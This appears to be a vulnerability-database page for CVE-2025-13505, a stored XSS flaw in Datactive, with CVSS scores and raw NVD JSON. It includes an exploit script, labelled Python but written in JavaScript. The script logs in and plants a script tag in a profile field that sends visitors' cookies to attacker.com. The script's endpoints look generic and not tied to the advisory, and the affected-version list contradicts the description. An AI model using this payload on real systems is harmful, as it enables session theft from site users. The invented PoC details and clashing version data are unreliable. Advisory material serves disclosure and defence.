Security Vulnerability Report
中文
CVE-2025-13505 CVSS 4.8 MEDIUM

CVE-2025-13505

Published: 2025-12-02 15:15:50
Last Modified: 2026-01-30 20:32:55

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting'), Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Datateam Information Technologies Inc. Datactive allows Stored XSS.This issue affects Datactive: from 2.13.34 before 2.14.0.6.

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:datateam:datactive:*:*:*:*:*:*:*:* - VULNERABLE
Datactive < 2.13.34
2.13.34 <= Datactive < 2.14.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-13505 Stored XSS PoC for Datactive // Target: Datactive < 2.14.0.6 and >= 2.13.34 const payload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'; // Login first with low-privilege account const loginUrl = 'http://target.com/login'; const targetUrl = 'http://target.com/profile/update'; async function exploit() { // Step 1: Authenticate const loginResponse = await fetch(loginUrl, { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({username: 'attacker', password: 'password123'}) }); const cookies = loginResponse.headers.get('Set-Cookie'); // Step 2: Inject stored XSS payload in user profile field await fetch(targetUrl, { method: 'POST', headers: { 'Content-Type': 'application/json', 'Cookie': cookies }, body: JSON.stringify({ firstName: payload, lastName: 'Test User', email: '[email protected]' }) }); console.log('Payload injected successfully. Wait for victim to visit profile page.'); } exploit().catch(console.error);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13505", "sourceIdentifier": "[email protected]", "published": "2025-12-02T15:15:49.623", "lastModified": "2026-01-30T20:32:54.783", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting'), Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Datateam Information Technologies Inc. Datactive allows Stored XSS.This issue affects Datactive: from 2.13.34 before 2.14.0.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-80"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:datateam:datactive:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.13.34", "versionEndExcluding": "2.14.0.6", "matchCriteriaId": "415C2CA0-1A9A-4C4F-A141-3816A79ED6EB"}]}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0424", "source": "[email protected]", "tags": ["US Government Resource", "Vendor Advisory"]}]}}